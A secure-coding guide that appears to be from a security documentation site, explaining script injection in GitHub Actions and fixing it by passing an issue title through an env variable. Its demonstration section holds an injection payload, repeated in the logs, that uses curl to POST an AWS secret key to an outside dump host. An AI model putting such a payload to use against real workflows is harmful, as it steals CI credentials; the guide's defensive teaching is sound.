Skip to main content
Script injection occurs when untrusted input is interpolated directly into shell commands, allowing attackers to execute arbitrary code. In GitHub Actions workflows, inline shell scripts are especially susceptible if values like issue titles or user inputs are expanded before execution. This guide shows how to move untrusted data into environment variables, ensuring it’s parsed at runtime rather than baked into your script.

Insecure Example

Interpolating untrusted input inside the run block lets attackers inject arbitrary commands.
Never build shell scripts by concatenating or expanding variables directly in the script body.
name: Label Issues (Script Injection)

on:
  issues:
    types: [opened]

jobs:
  assign-label:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/[email protected]
      - name: Add a Label
        env:
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        run: |
          # Unsafe: github.event.issue.title is expanded into the script
          issue_title="{{ github.event.issue.title }}"
          if [[ "$issue_title" == *"bug"* ]]; then
            echo "Issue is about a bug!"
            echo "Assigning Label - BUG.........."
          else
            echo "Not a bug"
          fi

Secure Approach

By passing untrusted input via the env block, the value is provided to the shell at execution time rather than expanded when the workflow is generated.
Defining issue_title as an environment variable prevents any injected payload from being interpreted as part of the script.
The shell will see it only as data.
name: Label Issues (Script Injection)

on:
  issues:
    types: [opened]

jobs:
  assign-label:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/[email protected]

      - name: Add a Label
        env:
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          issue_title: '${{ github.event.issue.title }}'
        run: |
          # Safe: issue_title is injected at runtime
          if [[ "$issue_title" == *"bug"* ]]; then
            echo "Issue is about a bug!"
            echo "Assigning Label - BUG .................."
          else
            echo "Not a bug"
          fi

Insecure vs. Secure Comparison

AspectInsecure WorkflowSecure Workflow
Expansion pointInline script (run block)Environment variable (env block)
VulnerabilityShell interprets injected characters as commandsShell treats the entire value as a string
Example assignmentissue_title="{{ github.event.issue.title }}"issue_title: '${{ github.event.issue.title }}'

Demonstration of Attack Mitigation

Simulate an issue title containing a malicious payload: 
# Simulated payload in the issue title:
# bug'; curl --request POST --data anything=$AWS_SECRET_ACCESS_KEY https://httpdump.app/dumps/XYZ

Workflow Logs

Run if [[ "$issue_title" == *"bug"* ]]; then
  if [[ "$issue_title" == *"bug"* ]]; then
    echo "Issue is about a bug!"
    echo "Assigning Label - BUG …"
  else
    echo "Not a bug"
  fi
fi
shell: /usr/bin/bash -e {0}
env:
  AWS_SECRET_ACCESS_KEY: ***
  issue_title: bug'; curl --request POST --data anything=$AWS_SECRET_ACCESS_KEY https://httpdump.app/dumps/XYZ

if [[ "$issue_title" == *"bug"* ]]; then
    echo "Issue is about a bug!"
    echo "Assigning Label - BUG …. …. …. …. .."
else
    echo "Not a bug"
fi
Output: 
Issue is about a bug!
Assigning Label - BUG …. …. …. …. ..
No external curl request is executed—only the intended logic runs.

HTTP Dump Confirmation

Inspecting the HTTP dump shows only the initial probe requests, confirming no secrets were exfiltrated: 
HEAD /dumps/XYZ
POST /dumps/XYZ

Further Reading

References

Watch Video